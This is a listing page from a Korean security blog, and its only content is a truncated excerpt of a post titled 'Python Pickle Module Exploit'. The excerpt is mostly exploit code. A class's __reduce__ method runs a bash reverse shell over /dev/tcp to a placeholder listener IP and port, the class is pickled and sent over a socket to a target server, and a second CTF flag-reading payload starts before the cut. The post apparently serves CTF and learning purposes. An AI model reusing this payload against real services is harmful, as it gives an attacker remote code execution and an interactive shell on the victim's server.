본문 바로가기

끄적끄적

검색하기
끄적끄적
프로필사진 Go0G

  • 분류 전체보기 (65)
    • Computer Science (0)
    • Security (30)
      • Web (8)
      • System (0)
      • Server (0)
      • Mobile (17)
      • Bugbounty (1)
      • Database (2)
      • Crypto (0)
    • Network (1)
      • Protocol (0)
    • Development (29)
      • JSP (23)
      • JavaScript (3)
      • Python (0)
      • Android(Kotlin) (2)
      • Algorism (1)
    • Cloud (0)
      • AWS (0)
      • Azure (0)
      • NCP (0)
      • GCP (0)
    • Law (1)
      • 개인정보보호법 (1)
      • 정보통신망법 (0)
      • 전자금융거래법 (0)
    • ETC (1)
      • Docker (1)
Guestbook
Notice
Recent Posts
Recent Comments
Link
Tags
  • UnCrackable level 1
  • PortSwigger
  • MariaDB
  • File Upload
  • CVE-2022-22965
  • XALZ 압축해제
  • HacktheBox Mobile
  • Hackthebox cat
  • JSP
  • nginx
  • SeeTheSharpFlag
  • Xamarin 분석
  • CVE-2010-1622
  • UnCrackable
  • HackTheBox APKey
  • xss
  • NoSQL
  • Directory traversal
  • CVE-2014-0094
  • DOM
  • mongoDB
  • login form
  • blind sql injection
  • HackTheBox
  • Android Backup
  • Android 6.0
  • getCachedIntrospectionResults
  • mstg
  • Frida
  • JAVA ClassLoader 취약점
more
Archives
Today
Total
관리 메뉴
  • 글쓰기
  • 방명록
  • 관리
  • 관리

목록CVE-2011-2520 (1)

끄적끄적

[vulnerability] Python Pickle Module Exploit

#RCE class Shell_code(object): def __reduce__(self): return (os.system,('/bin/bash -i >& /dev/tcp/"Client IP"/"Listening PORT" 0>&1',)) shell = cPickle.dumps(Shell_code()) client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect(('Server IP','Server PORT')) client_socket.send(shell) #CTF Flag Read(Web Server) class Read_Flag(object): def __reduce__(self): return (e..

Security/Web 2021. 10. 7. 10:31
Prev 1 Next

Blog is powered by kakao / Designed by Tistory

티스토리툴바